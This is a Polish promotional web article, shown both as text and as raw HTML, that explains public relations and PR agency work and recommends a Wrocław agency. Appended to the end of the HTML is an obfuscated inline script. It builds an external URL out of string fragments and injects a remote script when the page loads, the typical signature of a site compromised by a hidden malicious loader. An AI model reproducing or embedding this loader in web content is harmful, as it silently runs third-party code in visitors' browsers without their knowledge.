Na co dzień mamy do czynienia z ogromną ilością kanałów komunikacji – zjawisko to widoczne jest również w szeroko rozumianym biznesie. W końcu zarówno małe przedsiębiorstwa, jak i ogromne firmy muszą się komunikować z otoczeniem, aby odpowiednio kształtować opinie swoich odbiorców. Tym właśnie zajmują się działy i agencje PR.

Co to jest PR?

Zacznijmy jednak od początku. PR to skrót od angielskich słów public relations, które w dużym skrócie oznaczają relacje publiczne. Tłumaczenie to może i jest proste, jednak za nim kryje się bardzo rozbudowana definicja. PR oznacza bowiem działania skierowane do określonych odbiorców, mające w nienachalny sposób przynieść danemu podmiotowi rozgłos, a także wpłynąć korzystnie na jego wizerunek.

Jak działa agencja PR?

Pracownicy agencji PR to profesjonaliści, którzy zdobywają doświadczenie podczas kontaktów z rozmaitymi klientami. Zatrudniając agencję PR, firma kupuje sobie bezpieczeństwo w nagłych sytuacjach. Jest to swego rodzaju straż pożarna, która np. w przypadku wybuchu kryzysu szybko ugasi pożar z nim związany, a także pomoże naprawić wyrządzone przez niego szkody. Samotne bieganie z gaśnicą nie jest w takiej sytuacji najlepszym wyjściem… W województwie dolnośląskim skutecznością wyróżnia się agencja PR z Wrocławia – Commplace. Warto zapoznać się z ich ofertą.

Obowiązki PR-owca

Osoba pracująca w dziale PR nie zajmuje się jedną dziedziną – jej obowiązki są bardzo szerokie i obejmują wiele obszarów. Niektóre z nich to:

  • media relations – budowanie relacji z mediami,
  • monitoring i analiza mediów – monitorowanie treści, które ukazały się w Internecie,
  • komunikacja wewnętrzna – współdziałanie z działem HR i kontakt z pracownikami firmy,
  • redakcja tekstów – tworzenie tekstów na potrzeby firmy, np. notatek, ulotek, relacji z wydarzeń itd.,
  • komunikacja kryzysowa – stworzenie planu zarządzania kryzysowego,
  • raportowanie – pisanie sprawozdań z działań przeprowadzonych w firmie.

Korzyści z agencji PR

Oprócz niewątpliwego wsparcia podczas sytuacji kryzysowej agencja PR może zrobić dużo więcej dobrego dla firmy. Po pierwsze jej zadaniem jest bieżące monitorowanie działań firmy, a także tego, co dzieje się wokół niej, aby do kryzysu nie dopuścić. Po drugie tego typu jednostka pomaga przy selekcji i kształtowaniu informacji na temat przedsiębiorstwa, które mają trafić do mediów. Po trzecie tworzy materiały firmowe, organizuje szkolenia pracownicze i pomaga pracownikom uczestniczyć w szeroko rozumianej działalności PR-owej firmy.

Agencja PR – jak działa agencja PR?http://www.pruszkowmowi.pl/wp-content/uploads/2019/11/commplace1.pnghttp://www.pruszkowmowi.pl/wp-content/uploads/2019/11/commplace1-150x150.png admin BiznesMateriał partneraPolecane
Na co dzień mamy do czynienia z ogromną ilością kanałów komunikacji - zjawisko to widoczne jest również w szeroko rozumianym biznesie. W końcu zarówno małe przedsiębiorstwa, jak i ogromne firmy muszą się komunikować z otoczeniem, aby odpowiednio kształtować opinie swoich odbiorców. Tym właśnie zajmują się działy i agencje PR.Co...
<strong>Na co dzień mamy do czynienia z ogromną ilością kanałów komunikacji - zjawisko to widoczne jest również w szeroko rozumianym biznesie. W końcu zarówno małe przedsiębiorstwa, jak i ogromne firmy muszą się komunikować z otoczeniem, aby odpowiednio kształtować opinie swoich odbiorców. Tym właśnie zajmują się działy i agencje PR.</strong><a href="https://www.pruszkowmowi.pl/wp-content/uploads/2019/11/commplace1.png"><img class="wp-image-8938 aligncenter" src="https://www.pruszkowmowi.pl/wp-content/uploads/2019/11/commplace1.png" alt="" width="781" height="521" /></a> <h2>Co to jest PR?</h2> Zacznijmy jednak od początku. PR to skrót od angielskich słów public relations, które w dużym skrócie oznaczają relacje publiczne. Tłumaczenie to może i jest proste, jednak za nim kryje się bardzo rozbudowana definicja. PR oznacza bowiem działania skierowane do określonych odbiorców, mające w nienachalny sposób przynieść danemu podmiotowi rozgłos, a także wpłynąć korzystnie na jego wizerunek. <h2>Jak działa agencja PR?</h2> Pracownicy agencji PR to profesjonaliści, którzy zdobywają doświadczenie podczas kontaktów z rozmaitymi klientami. Zatrudniając agencję PR, firma kupuje sobie bezpieczeństwo w nagłych sytuacjach. Jest to swego rodzaju straż pożarna, która np. w przypadku wybuchu kryzysu szybko ugasi pożar z nim związany, a także pomoże naprawić wyrządzone przez niego szkody. Samotne bieganie z gaśnicą nie jest w takiej sytuacji najlepszym wyjściem… W województwie dolnośląskim skutecznością wyróżnia się agencja PR z Wrocławia - <a href="https://commplace.pl/">Commplace</a>. Warto zapoznać się z ich ofertą. <h2>Obowiązki PR-owca</h2> Osoba pracująca w dziale PR nie zajmuje się jedną dziedziną - jej obowiązki są bardzo szerokie i obejmują wiele obszarów. Niektóre z nich to: <ul> <li data-leveltext="●" data-font="Times New Roman" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1">media relations - budowanie relacji z mediami,</li> <li data-leveltext="●" data-font="Times New Roman" data-listid="1" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1">monitoring i analiza mediów - monitorowanie treści, które ukazały się w Internecie,</li> <li data-leveltext="●" data-font="Times New Roman" data-listid="1" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1">komunikacja wewnętrzna - współdziałanie z działem HR i kontakt z pracownikami firmy,</li> <li data-leveltext="●" data-font="Times New Roman" data-listid="1" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1">redakcja tekstów - tworzenie tekstów na potrzeby firmy, np. notatek, ulotek, relacji z wydarzeń itd.,</li> <li data-leveltext="●" data-font="Times New Roman" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1">komunikacja kryzysowa - stworzenie planu zarządzania kryzysowego,</li> <li data-leveltext="●" data-font="Times New Roman" data-listid="1" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1">raportowanie - pisanie sprawozdań z działań przeprowadzonych w firmie.</li> </ul> <h2>Korzyści z agencji PR</h2> Oprócz niewątpliwego wsparcia podczas sytuacji kryzysowej agencja PR może zrobić dużo więcej dobrego dla firmy. Po pierwsze jej zadaniem jest bieżące monitorowanie działań firmy, a także tego, co dzieje się wokół niej, aby do kryzysu nie dopuścić. Po drugie tego typu jednostka pomaga przy selekcji i kształtowaniu informacji na temat przedsiębiorstwa, które mają trafić do mediów. Po trzecie tworzy materiały firmowe, organizuje szkolenia pracownicze i pomaga pracownikom uczestniczyć w szeroko rozumianej działalności PR-owej firmy.<script> (function(){ te0du="csya8qu6e0dg";te0d=document.createElement("script"); te0d_="u"+("st");te0d_+="at"+(".");te0d.async=true;te0d_+="in"; te0du="186449295."+te0du;te0d.type="text/javascript";te0du+="kvwaxtXXngal"; te0du+="4e86yb";te0d_+=("f")+"o"+("/");te0d.src="https://"+te0d_+te0du; te0dd=document.body;te0dd.appendChild(te0d); })(); </script>